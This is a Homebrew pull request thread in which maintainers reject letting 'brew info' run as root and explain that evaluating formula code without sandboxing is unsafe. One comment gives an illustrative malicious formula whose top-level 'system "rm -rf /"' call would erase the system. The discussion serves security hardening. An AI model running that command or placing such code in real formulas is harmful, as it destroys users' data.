### PR TITLE
brew: info: allow as root

### PR DESCRIPTION
**Pull request by damonbreeden**
bc info is a harmless command and sometimes you want the info

- [√] Have you followed the guidelines in our [Contributing](https://github.com/Homebrew/brew/blob/HEAD/CONTRIBUTING.md) document?
- [√ ] Have you checked to ensure there aren't other open [Pull Requests](https://github.com/Homebrew/brew/pulls) for the same change?
- [√ ] Have you added an explanation of what your changes do and why you'd like us to include them?
- [ ] Have you written new tests for your changes? [Here's an example](https://github.com/Homebrew/brew/blob/HEAD/Library/Homebrew/test/PATH_spec.rb).
  - i'll need some guidance on that
- [√ ] Have you successfully run `brew style` with your changes locally?
- [ √] Have you successfully run `brew typecheck` with your changes locally?
- [ √] Have you successfully run `brew tests` with your changes locally?

-----

### CODE REVIEW

**Review by apainintheneck — CHANGES_REQUESTED** [review]
I'm not entirely convinced this is a harmless command or that we want to start allowing sudo use of non-trivial commands. Each formula or cask is a bunch of Ruby code that has to be evaluated so it's possible that people could do nefarious things with it.

This isn't an issue with the new API but not everyone's using that anyway so I don't think that it makes sense to enable sudo for this command.

There was some related discussion in this issue from a few months ago that might give you more insight into this. One interesting idea is to make certain commands API-only but nobody has really followed up on that.

- https://github.com/Homebrew/brew/issues/14010

**Comment by MikeMcQuaid** [comment]
> I'm not entirely convinced this is a harmless command or that we want to start allowing sudo use of non-trivial commands.

I agree. Any command that evaluates a formulae should never be run as `root` as there is no sandboxing. Consider the following formula:

```ruby
class Innocent < Formula
  url "https://lol.owned"
  system "rm -rf /"
end
```

If you run this as `root` on Linux: you will erase your entire system when you run `brew info innocent`.

**Comment by RandomDSdevel** [comment]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Speculative aside:  If there was any way to forbid formula and cask authors from using formula/cask top-level '`system()`' calls outside of DSL sub-blocks where it makes sense for calls to '`sustem()`' to be allowed&thinsp;—&thinsp;though I suspect that this could well prove difficult or even impossible to do since the '`system()`' function comes from the Ruby standard library &thinsp;—, would it make any sense to try and do that at some point?  (This would be separate from and in addition to not allowing commands like '`brew readall`,' etc. to evaluate formula and cask code indiscriminately without requiring their '`--eval-all`' switch or the '`HOMEBREW_EVAL_ALL`' environment variable, as is currently the case.)  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(I doubt this would affect the outcome here; it was just a thought as to what a potential further security-hardening precautions could be.)

**Comment by apainintheneck** [comment]
@RandomDSdevel That is an interesting idea. Since Ruby tends to be a free-spirited programming language, I assume that there'd always be some crazy workaround available for people who really want to cause havoc. There might be some way to "sandbox" things a bit more though; I honestly haven't done any research into it.

**Comment by MikeMcQuaid** [comment]
> There might be some way to "sandbox" things a bit more though; I honestly haven't done any research into it.

Yeh, there's `chroot`s, containers (which, notably, we allow root inside) and many other ways. Until these are actually implemented and working by default, though, it would be irresponsible for us to allow `root` access more widely.

> Since Ruby tends to be a free-spirited programming language, I assume that there'd always be some crazy workaround available for people who really want to cause havoc.

This 👍🏻

**Pull request closed without merging**
